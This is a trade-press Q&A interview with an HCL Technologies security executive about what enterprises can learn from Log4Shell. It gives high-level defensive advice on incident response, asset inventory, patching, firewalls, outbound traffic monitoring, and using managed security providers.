What Log4Shell still means for the enterprise [Q&A]
When the Log4Shell vulnerability first appeared at the end of last year it sent a shockwave through the cybersecurity community.
But just because it's no longer in the headlines doesn't mean it's gone away. There's still a lot that enterprises can learn from the vulnerability and the response to it. We spoke to Maninder Singh, corporate vice president and global head of cybersecurity and GRC services at HCL Technologies, to find out more.
BN: Log4Shell won't be the last security vulnerability to be discovered and exploited, so how can enterprises put themselves in a position to deal with this kind of threat in the future?
MS: At a fundamental level, securing organizational IT systems should not be approached in a reactive way. Instead, dealing with critical IT incidents, such as cyberattacks or systems breaches, should be a proactive, integrated part of any disaster recovery and business continuity plan.
However, as the Log4Shell vulnerability has demonstrated, there will always be blind spots in interdependent connected systems. The unpredictability of emergency scenarios emphasizes the need for a holistic, capabilities-based approach, building in the ability to adapt to a variety of challenges. It is important for organizations to have a complete view over their software supply chain by tracking all their assets.
There's a lot to take in, so enterprises may be left wondering where to begin. Each organization is structured differently, but most would either benefit from the creation of an incident response group or understanding how a Managed Security Provider (MSP) could assist with an incident response group.
BN: How can incident response teams help?
MS: From the outset, it is vital to define a recovery strategy to isolate and mitigate emergency triggers, preserve critical systems, secure data, and migrate to backup systems for business continuity. Incident response teams should start by identifying all software assets and classifying them into two categories -- vendor-provided software and in-house software. If the technology is vendor owned, it is likely organizations will need to rely on their guidance and updates to patch the software.
Applications built in-house should be scanned with a software composition analysis (SCA) tool to assess the vulnerability. Any systems that are externally facing, like websites or servers, need to undergo a mitigation process, while web application firewall rules should be updated to detect exploit activities.
BN: How else can you protect your organization against unknown risks?
Zero-day are exploits are vulnerabilities that are targeted before they have been discovered by the security community, which makes them very difficult to detect and block. The Log4Shell vulnerability is a perfect example of one of these.
To mitigate the threat of zero-day exploits, organizations must focus on implementing security best practices. It's important to carry out periodic assessments to identify any vulnerabilities in the environment. This means if any are found, organizations can implement a patch management strategy. The attack surface can also be reduced by implementing security controls like next generation antivirus and endpoint detection and response solutions, to protect against infections that target Java scripts or objects.
An organization can protect its network by implementing web application firewalls and intrusion prevention systems. Outbound network traffic must be evaluated based on host name and IP reputation, and any network connection to un-trusted destinations should be terminated. It is also a good idea to monitor unexpected traffic to ensure it is legitimate.
Essentially, businesses need to prevent the spread of risks by limiting connections only to those required for business needs. This will mitigate the spread of an exploit within the organization after initial infection, by controlling access to systems and folders with privilege restrictions.
Even with these measures in place, organizations can still be infected by a zero-day exploit. To minimize damage, well-planned incident-response measures, with defined roles and procedures including prioritization of mission-critical activities, are crucial along with user awareness and continuous training to avoid falling into the trap of malicious actors/activities.
BN: What are the critical monitoring points for IT infrastructure?
MS: No one point in the IT infrastructure is more important than the rest. As the old saying goes, the chain is only as strong as its weakest link. In this case, one weakness left unattended can collapse an entire security system, especially those that are increasingly complex. That's why it’s important to emphasize a holistic approach in IT infrastructure, which is the backbone of any modern enterprise.
In terms of monitoring, it's important to recognize the increasing complexity of hybrid environments, especially with regards to their threat exposure on the cloud and third-party access. With a variety of cloud platforms and native monitoring solutions, gaps in visibility can result in significant security threats. For organizations shifting to a microservices-based architecture with native cloud solutions, it's best to partner with an MSP for cybersecurity solutions, so they can benefit from a dedicated team led by industry best practices.
BN: What value can outside experts bring in this type of situation?
MS: Enlisting an MSP is no longer just about efficiency and capacity enhancement, but also about winning the 'knowledge game'. While there are natural benefits to shifting to an OpEx model, it also allows organization to focus on their core competencies.
By partnering with an MSP, organizations can leverage high level expertise in continuous system monitoring, by taking advantage of advanced automation solutions, proactive alerts and expert resources for threat mitigation.
Experienced MSPs can help organizations adopt best-of-breed technology solutions while also acquiring process roadmaps that align with their business goals. Such a partner can provide a single source of truth to the organization that seamlessly integrates with its DevOps team to save time, improve efficiency, and allow organizations to focus on their core business.